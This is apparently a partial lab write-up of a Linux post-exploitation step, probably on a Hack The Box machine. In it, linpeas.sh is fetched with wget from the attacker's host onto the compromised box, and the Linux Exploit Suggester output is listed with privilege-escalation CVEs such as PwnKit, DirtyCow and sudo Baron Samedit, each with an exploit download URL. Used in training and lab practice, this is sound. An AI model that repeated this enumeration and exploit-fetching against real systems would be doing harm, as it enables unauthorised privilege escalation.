PEAS automates the entire post-exploitation enumeration process, including the basic checks

PEAS


nibbler@nibbles:/tmp$ wget http://10.10.14.6:8000/PEASS-ng/payloads/linpeas.sh
wget http://10.10.14.6:8000/PEASS-ng/payloads/linpeas.sh
--2023-01-13 23:24:40--  http://10.10.14.6:8000/PEASS-ng/payloads/linpeas.sh
connecting to 10.10.14.6:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: 'linpeas.sh'
 
linpeas.sh          100%[===================>] 808.42K  2.39MB/s    in 0.3s    
 
2023-01-13 23:24:41 (2.39 MB/s) - 'linpeas.sh' saved [827827/827827]

Delivery

PEAS discovered that the target system is vulnerable to CVE-2021-4034

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester

[+] [CVE-2017-16995] eBPF_verifier

   details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   exposure: highly probable
   tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   download url: https://www.exploit-db.com/download/45010
   comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   exposure: highly probable
   tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   download url: https://www.exploit-db.com/download/40611
   comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   exposure: highly probable
   tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   download url: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-4034] PwnKit

   details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   exposure: probable
   tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   exposure: probable
   tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   exposure: probable
   tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   exposure: probable
   tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   download url: https://www.exploit-db.com/download/41458
   comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   exposure: probable
   tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   exposure: probable
   tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
   download url: https://www.exploit-db.com/download/40871
   comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-4557] double-fdput()

   details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   exposure: probable
   tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   download url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   exposure: less probable
   tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   download url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   exposure: less probable
   tags: ubuntu=(20.04){kernel:5.12.13}
   download url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   exposure: less probable
   tags: mint=19,ubuntu=18|20, debian=10
   download url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   exposure: less probable
   tags: ubuntu=20.04{kernel:5.8.0-*}
   download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   exposure: less probable
   tags: mint=19
   download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   exposure: less probable
   download url: 
   comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   exposure: less probable
   tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   download url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   details: https://seclists.org/oss-sec/2017/q1/184
   exposure: less probable
   download url: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   exposure: less probable
   tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   exposure: less probable
   tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   download url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   exposure: less probable
   download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   details: https://xairy.github.io/blog/2016/cve-2016-2384
   exposure: less probable
   tags: ubuntu=14.04,fedora=22
   download url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   exposure: less probable
   download url: https://www.exploit-db.com/download/40003
   comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working

PEAS also found several more, but they aren't as promising as the one identified earlier

Some more